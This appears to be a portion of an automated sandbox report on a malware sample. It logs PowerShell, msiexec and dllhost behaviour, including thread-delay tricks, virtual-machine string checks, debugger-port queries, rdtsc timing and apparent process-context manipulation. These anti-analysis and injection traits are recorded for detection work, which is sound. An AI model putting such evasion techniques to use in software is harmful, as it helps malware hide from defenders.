              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387D1C0 rdtsc 11_2_0387D1C0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5808Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4055Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6436Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3338Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeAPI coverage: 2.1 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\dllhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
              Source: msiexec.exe, 00000008.00000003.2294292940.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000001.00000002.1943817554.0000024B3E4C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966014454.0000000000A6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: msiexec.exe, 00000008.00000003.2294292940.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387D1C0 rdtsc 11_2_0387D1C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03844340 NtSetContextThread,LdrInitializeThunk,11_2_03844340
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382438F mov eax, dword ptr fs:[00000030h]11_2_0382438F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382438F mov eax, dword ptr fs:[00000030h]11_2_0382438F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D539D mov eax, dword ptr fs:[00000030h]11_2_038D539D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0385739A mov eax, dword ptr fs:[00000030h]11_2_0385739A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0385739A mov eax, dword ptr fs:[00000030h]11_2_0385739A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038333A0 mov eax, dword ptr fs:[00000030h]11_2_038333A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038333A0 mov eax, dword ptr fs:[00000030h]11_2_038333A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038233A5 mov eax, dword ptr fs:[00000030h]11_2_038233A5
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9353 mov eax, dword ptr fs:[00000030h]11_2_037F9353
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9353 mov eax, dword ptr fs:[00000030h]11_2_037F9353
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FD34C mov eax, dword ptr fs:[00000030h]11_2_037FD34C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FD34C mov eax, dword ptr fs:[00000030h]11_2_037FD34C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h]11_2_0380A3C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h]11_2_0380A3C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h]11_2_0380A3C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h]11_2_0380A3C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h]11_2_0380A3C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h]11_2_0380A3C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h]11_2_038083C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h]11_2_038083C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h]11_2_038083C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h]11_2_038083C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BC3CD mov eax, dword ptr fs:[00000030h]11_2_038BC3CD
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038863C0 mov eax, dword ptr fs:[00000030h]11_2_038863C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F7330 mov eax, dword ptr fs:[00000030h]11_2_037F7330
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BB3D0 mov ecx, dword ptr fs:[00000030h]11_2_038BB3D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h]11_2_038103E9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BF3E6 mov eax, dword ptr fs:[00000030h]11_2_038BF3E6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FC310 mov ecx, dword ptr fs:[00000030h]11_2_037FC310
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D53FC mov eax, dword ptr fs:[00000030h]11_2_038D53FC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E3F0 mov eax, dword ptr fs:[00000030h]11_2_0381E3F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E3F0 mov eax, dword ptr fs:[00000030h]11_2_0381E3F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381E3F0 mov eax, dword ptr fs:[00000030h]11_2_0381E3F0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038363FF mov eax, dword ptr fs:[00000030h]11_2_038363FF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388930B mov eax, dword ptr fs:[00000030h]11_2_0388930B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388930B mov eax, dword ptr fs:[00000030h]11_2_0388930B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388930B mov eax, dword ptr fs:[00000030h]11_2_0388930B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383A30B mov eax, dword ptr fs:[00000030h]11_2_0383A30B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383A30B mov eax, dword ptr fs:[00000030h]11_2_0383A30B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383A30B mov eax, dword ptr fs:[00000030h]11_2_0383A30B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03820310 mov ecx, dword ptr fs:[00000030h]11_2_03820310
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C132D mov eax, dword ptr fs:[00000030h]11_2_038C132D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C132D mov eax, dword ptr fs:[00000030h]11_2_038C132D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382F32A mov eax, dword ptr fs:[00000030h]11_2_0382F32A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03882349 mov eax, dword ptr fs:[00000030h]11_2_03882349
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D5341 mov eax, dword ptr fs:[00000030h]11_2_038D5341
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388035C mov eax, dword ptr fs:[00000030h]11_2_0388035C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388035C mov eax, dword ptr fs:[00000030h]11_2_0388035C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388035C mov eax, dword ptr fs:[00000030h]11_2_0388035C
